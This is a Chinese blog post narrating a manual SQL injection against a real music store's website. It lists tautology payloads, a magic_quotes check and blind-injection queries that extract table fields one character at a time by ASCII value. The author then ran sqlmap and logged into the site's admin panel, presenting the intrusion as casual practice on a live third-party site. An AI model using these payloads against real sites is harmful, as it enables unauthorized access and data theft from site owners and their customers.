【渗透实战】对某琴行进行手工注入

●漏洞已提交
■重要细节全部打码
■部分细节对外开放
■本次入侵不对网站数据库进行任何更改

google上找到一个琴行网站
①判断sql注入
注入单引号’
报错"商品已下架"
改注入条件,网站后加上’ or ‘1’='1
先注入永真条件
报错"商品已下架",并且不爆出具体错误
那么更改永真语句 %'or 1=1
仍然不返回正常网页,继续更改
or 1=1
在这里插入图片描述
网页正常返回并爆出该表下所有数据
在这里插入图片描述
●判断:存在sql注入点

②判断magic_quotes_gpc
这个很简单,只要向网站注入 and ‘1’=‘1’就好
如果gpc打开,单引号就会被转义为’,导致返回页面不正常,这里网站gpc并没有打开,这就好办了
●gpc不打开

③判断customErrors是否打开
根据上面的注入过程,网站并不爆详细错误,但是有注入点,所以我收集不到它的具体网站数据库名称
●customErrors打开,并且转跳到"商品已下架"界面

④开始盲注
因为不返回具体信息,所以having 1=1的方法就报废了
所以盲注检测数据库
and exists(select * from 表名)
这个方法判断当前数据库下是否有此表
and (select count(字段) from 表名)
判断此表名下是否有某字段
and (select top 1 len (字段) from 表名)>数字
判断该列的字段长度是否大于某个数
and (select top 1 asc (mid (字段,位数,1)) from 表名) >ascii(1~128)
判断字段的ascii码
比如and (select top 1 asc (mid (字段,位数,1)) from 表名) >96
如果返回正常,而97返回不正常那么该字段的某位数的ascii码为97,查询ascii码表,此字为a
接着一个个猜就行,不过我可没这耐心,我直接用sqlmap跑出字段了
在这里插入图片描述

成功登入网站管理界面
此处入侵没有什么技术含量,纯粹练练手感
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/ALDYS4/article/details/85023283
今日推荐